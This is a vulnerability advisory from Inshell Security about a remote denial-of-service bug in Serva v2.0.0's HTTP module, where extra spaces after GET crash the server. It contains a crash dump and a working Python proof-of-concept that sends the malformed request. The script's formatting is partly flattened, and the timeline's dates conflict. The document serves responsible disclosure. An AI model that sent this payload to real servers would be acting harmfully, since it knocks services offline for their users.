[IA34] Serva v2.0.0 HTTP Server GET Remote Denial of Service

2013-02-04T00:00:00
ID SECURITYVULNS:DOC:28999
Type securityvulns
Reporter Securityvulns
Modified 2013-02-04T00:00:00

Description

Inshell Security Advisory http://www.inshell.net

1. ADVISORY INFORMATION

Product: Serva Vendor URL: www.vercot.com Type: Uncaught Exception [CWE-248] Date found: 2012-12-07 Date published: 2013-01-14 CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVE: -

2. CREDITS

This vulnerability was discovered and researched by Julien Ahrens from Inshell Security.

3. VERSIONS AFFECTED

Serva 2.0.0, older versions may be affected too.

4. VULNERABILITY DESCRIPTION

Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in the HTTP module.

The application uses a space delimiter to parse a GET Request. Adding more than one space (\x20) behind the GET will cause the application to crash with an unhandled c++ exception.

(b50.18c): Unknown exception - code 000006d9 (first chance) (b50.a9c): C++ EH exception - code e06d7363 (first chance) (b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!) eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0 edi=ffffffff eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 kernel32!RaiseException+0x53: 7c812afb 5e pop esi

5. PROOF-OF-CONCEPT (CODE / Exploit)

!/usr/bin/python

import socket

target="192.168.0.21" port=80

0000 47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d GET / HTTP/1.1.

0010 0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39 .Host: http://19

0020 32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74 2.168.0.21..Cont

0030 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d ent-Length: 0...

0040 0a .

payload = ( "\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+ "\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+ "\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+ "\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+ "\x0a" )

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((target, port)) print "[*] Connected to " + target + "!" except: print "[!] " + target + " didn't respond\n" sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!\n" s.close()

For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/34

6. SOLUTION

None

7. REPORT TIMELINE

2012-12-07: Initial notification sent to vendor 2012-07-18: Vendor does not accept the bug 2013-01-14: Full Disclosure

8. REFERENCES

http://security.inshell.net/advisory/34